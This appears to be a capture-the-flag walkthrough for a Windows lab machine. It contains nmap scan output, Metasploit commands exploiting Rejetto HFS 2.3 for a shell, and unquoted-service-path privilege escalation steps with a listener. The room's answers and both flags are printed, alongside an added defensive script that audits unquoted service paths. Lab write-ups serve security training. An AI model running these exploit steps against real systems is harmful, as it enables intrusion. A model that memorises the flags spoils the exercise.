nmap -sS -A 10.10.227.204 -oN recon.nmap
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-28 14:57 BST
Nmap scan report for ip-10-10-227-204.eu-west-1.compute.internal (10.10.227.204)
Host is up (0.00050s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl Microsoft SChannel TLS
| fingerprint-strings:
| TLSSessionReq:
| i]cW
| \x9bK
| !r|b
| steelmountain0
| 230327134335Z
| 230926134335Z0
| steelmountain0
| Y7;7
| \x18
| S~M>t%
| T}}~
| lJW2
| $0"0
| iBD\x18
| $ejT
|_ Ur^Cg
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2023-03-27T13:43:35
|_Not valid after: 2023-09-26T13:43:35
|_ssl-date: 2023-03-28T13:59:36+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.60%I=7%D=3/28%Time=6422F28B%P=x86_64-pc-linux-gnu%r(TL
SF:SSessionReq,346,"\x16\x03\x03\x03A\x02\0\0M\x03\x03d\"\xf2\x86\r\x9f\x9
SF:3\xefi\]cW\xad\\\x9bK\xae\x01NE\xb6\|vg\xf9\x10\x1a\xf3\x0b\x11\x88s\x2
SF:0\xf2=\0\0\xb1\x91,\x9d\x04\xe6o\xe6\x97\x05\x02c\xfd\(A\xad\xb8\xd8L6\
SF:xad\xeb\xbe-\xb7\x1c\x13\xfc\0/\0\0\x05\xff\x01\0\x01\0\x0b\0\x02\xe8\0
SF:\x02\xe5\0\x02\xe20\x82\x02\xde0\x82\x01\xc6\xa0\x03\x02\x01\x02\x02\x1
SF:0=\|\xaf\xce\x9d\xceY\xb7K\x13\xb9!r\|b\xf70\r\x06\t\*\x86H\x86\xf7\r\x
SF:01\x01\x05\x05\x000\x181\x160\x14\x06\x03U\x04\x03\x13\rsteelmountain0\
SF:x1e\x17\r230327134335Z\x17\r230926134335Z0\x181\x160\x14\x06\x03U\x04\x
SF:03\x13\rsteelmountain0\x82\x01\"0\r\x06\t\*\x86H\x86\xf7\r\x01\x01\x01\
SF:x05\0\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\0\xb5V\x7f\x0f\xfd
SF:\xb6\0\x05\x98\x19\xe0-\xffH\xd3\xd9<\xae2\xf1\]\x0e\xdd\x1a\xde`y\x9e\
SF:x1a\xf8\x92\x88\*\xbfHu\x13B}\x8e\x1b\x9d\x9a\xd8\xda\xa5\x1a\)\x1fE\xc
SF:9\xa6\xca\xdb\xcfua2\xef\x14rg\x9d\xaf\[6\xc4\x9dz\x0e<\xa4<\xe2\xc2\xa
SF:0\xf2\xf2\x16t\xb8>\x0e\x8c/\xc2\xc2\x04Y\x85M\x0b\xae3\xef\xd2\xcb\x95
SF:\)\x12Y7;7\xe6\xf2\xae\\\x18\x93\x8d\x12p\x10\xb7\xd8\xdb\xd6\xb5DX\xa1
SF:\x1c\x05\xe3KV\x1f\xbf\x81\xdc\x9b\xf1\xd4:\x91\x81pd#\xa5\xde\xd7{\xe7
SF:<\x8d:c\xc4\xce\xc01=\x8e\x13U%W\x996\x01\x8e\xc7\xc8\x97b\xd5S~M>t%\x1
SF:6\xd5l\"\x01\xe4\x9f6\xb1\xbdBUm\x80\xafS\xf8\xc32\xf0\xaak\x13\x8cv_`\
SF:x1a\xb6\x20Ex\xab2\xb2NsR\xe2\xfb\x93EL\x14}\xc6\xa5\xd0IR\xad\xd9\x90&
SF:`\xdf\xa1\x04\xa1\xd55;\[\xddT}}~\x0bD\xfblJW2\x9a\xcdV\xed\x92W\xcb\x0
SF:2\x03\x01\0\x01\xa3\$0\"0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08\+\x06\x0
SF:1\x05\x05\x07\x03\x010\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x0400\r\x06
SF:\t\*\x86H\x86\xf7\r\x01\x01\x05\x05\0\x03\x82\x01\x01\0I\xfa\xe4fv\x1d\
SF:xf1\x93\xca\xc4\xadiBD\\\x18\xe8\xae4f\xd7\x15\xd3QV\xfc\x95\x89T\x1b\x
SF:bc\$ejT\xf3\x90\xe2\xa5\xd4\"B\xb9\x16V\xbc\x80\xa9\xc8\xb9I\x9dYf\xcb\
SF:xc2rZ\xf8\xd3DcA\xec\xf6\xc7;\x9dka\xc1\x07-\xab\x7f,\xbd\xdb\x1e\xac\x
SF:13w~\xde\x0e\]\xe6\xf6t\x88\xcf\xa9O\xb5Q\xde\xcas\xc2\x14T\xbbF\x0b\xa
SF:bD\xfa\x17\xbb\xcb\x9d/\0\xb4\x0b\x12\xdf6\xe9\x08\xa0\x8d\x89\xe8\x96\
SF:x11\xaaZ\xbd\xf5I4\x9d\t\xd3e\x8c\xaf\x85UF\xae\xdeM\xd9\x07<\xec\xb1q\
SF:x84t\xb2Q\x20\xe2`\x1d\xfb\xbd\"\x10\xc5h;\xbb\xb1\xfc\xfcUr\^Cg\xfd\xc
SF:9\xd4\x04\x97\*\xb2pb9\xf1\x8f\xc0\xe1\x8c\x0c\x0eg'P\x19\x136\xc0\x032
SF:T\x07\xed}\xcdU\x9f\x0c\x9e\xb3\xbc7\xce\x8f\xd9\x14D\xdbd\x97Ma\x13\xf
SF:d\x1e\x9e\xd9i\xd5\xbe\xa8\xeb\x9f\x86\x11\x8f_\xff\xb5\xbd\xba\xdc\xe8
SF:J\xfb4\.\xa9\xd0\x05Q\x1d\x94%\xed\xb2\x0e\0\0\0");
MAC Address: 02:63:4A:A4:5E:63 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=3/28%OT=80%CT=1%CU=41505%PV=Y%DS=1%DC=D%G=Y%M=02634A%T
OS:M=6422F2CE%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%TS=7
OS:)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=RD%II=I%SS=S%TS=7)OPS(O1=M2301NW8ST11%
OS:O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2301NW8ST11%O5=M2301NW8ST11%O6=M230
OS:1ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T
OS:=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%
OS:RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%I
OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:63:4a:a4:5e:63 (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-03-28 14:59:36
|_ start_date: 2023-03-28 14:43:25
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms ip-10-10-227-204.eu-west-1.compute.internal (10.10.227.204)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.48 seconds
There are two web servers running, one on port 80 and the other on port 8080.
The server on port 8080 is HFS 2.3, which has a number of public exploits.
Let's first exploit it with Metasploit:
use exploit/windows/http/rejetto_hfs_exec
set RPORT 8080
set RHOSTS 10.10.227.204
exploit
And we get a Meterpreter shell. Move to the Desktop folder and get the user flag.
Scan the machine with nmap. What is the other port running a web server on?
8080
Take a look at the other web server. What file server is running?
rejetto http file server
What is the CVE number to exploit this file server?
2014-6287
Use Metasploit to get an initial shell. What is the user flag?
b04763b6fcf51fcd7c13abc7db4fd365
Privilege escalation
Let's first check the Metasploit local exploit suggester:
use post/multi/recon/local_exploit_suggester
It only found exploit/windows/local/bypassuac_eventvwr, which did not work.
The reverse Meterpreter payload dies if used directly, so we have to chain it with post/windows/manage/migrate.
Now upload the malicious file, switch from Meterpreter to a shell, stop the service, copy the file to the same location, start a listener on port 4443 and start the service again.
Pay close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
AdvancedSystemCareService9
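An unquoted service path with spaces is a misconfiguration an administrator can find and fix before anyone abuses it. As an added audit example (not part of the room's walkthrough and not a tool the room uses), here is a Python check that flags services whose PathName is unquoted and contains spaces, lists the prefixes the Service Control Manager would try before the real binary (and so the directories whose ACLs must not allow standard users to write), and prints the `sc config` command that fixes the quoting. The input format is that of `wmic service get Name,PathName,StartMode /format:csv`; the sample rows are constructed, and the path given for AdvancedSystemCareService9 is invented for illustration, not taken from the target. The CanRestart property mentioned in the question is a separate check that this script does not reproduce.

```python
import csv
import io
import ntpath
import sys

# Constructed sample in the layout of
#   wmic service get Name,PathName,StartMode /format:csv
# The first service name is the one from the room; its path and the other two
# services are invented for illustration, not taken from the target.
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
STEELMOUNTAIN,AdvancedSystemCareService9,C:\Program Files (x86)\Example Vendor\Advanced SystemCare\service.exe,Auto
STEELMOUNTAIN,Spooler,C:\Windows\System32\spoolsv.exe,Auto
STEELMOUNTAIN,QuotedService,"C:\Program Files\Example Vendor\svc.exe" -run,Auto
"""


def executable_path(path_name):
    """Return (binary path without arguments, was_quoted) for a service PathName."""
    path_name = path_name.strip()
    if path_name.startswith('"'):
        return path_name[1:path_name.index('"', 1)], True
    end = path_name.lower().find(".exe")
    exe = path_name[:end + 4] if end != -1 else path_name.split(" ")[0]
    return exe, False


def lookup_candidates(exe):
    """Prefixes the Service Control Manager tries before the full path, one per
    space; the directory holding each must not be writable by standard users."""
    cands = []
    i = exe.find(" ")
    while i != -1:
        cands.append(exe[:i])
        i = exe.find(" ", i + 1)
    return cands


def audit_services(csv_text):
    """Return one finding per service with an unquoted, space-containing path."""
    # QUOTE_NONE keeps literal quotes in PathName so quoted paths are recognised.
    reader = csv.DictReader(io.StringIO(csv_text.strip()), quoting=csv.QUOTE_NONE)
    findings = []
    for row in reader:
        exe, quoted = executable_path(row["PathName"])
        if quoted or " " not in exe:
            continue
        cands = lookup_candidates(exe)
        dirs = []
        for c in cands:
            d = ntpath.dirname(c)
            if d not in dirs:
                dirs.append(d)
        findings.append({
            "name": row["Name"],
            "path": exe,
            "candidates": cands,
            "dirs_to_check": dirs,
            # Remediation: wrap the whole PathName in quotes.
            "fix": f'sc config "{row["Name"]}" binPath= "\\"{row["PathName"].strip()}\\""',
        })
    return findings


if __name__ == "__main__":
    # Redirected wmic output is normally UTF-16; pass the file as argv[1].
    if len(sys.argv) > 1:
        text = open(sys.argv[1], encoding="utf-16").read()
    else:
        text = SAMPLE_WMIC_CSV
    for f in audit_services(text):
        print(f"[!] {f['name']}: unquoted path {f['path']}")
        print("    SCM would try first:", *f["candidates"], sep="\n      ")
        print("    check ACLs on:", *f["dirs_to_check"], sep="\n      ")
        print("    fix:", f["fix"])
```

On the sample only AdvancedSystemCareService9 is reported: Spooler has no spaces in its path and QuotedService is already quoted. After applying the printed `sc config` command, re-run the audit to confirm the service no longer appears, and verify that the listed directories are not writable by standard users, since a writable C:\ or vendor directory is what turns an unquoted path into a privilege escalation.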
What is the root flag?
9af5f314f57607c00fd09803a587db80
Manual Exploitation
Change the IP address within the file to your local IP.
Now download the netcat binary and host it on the web server.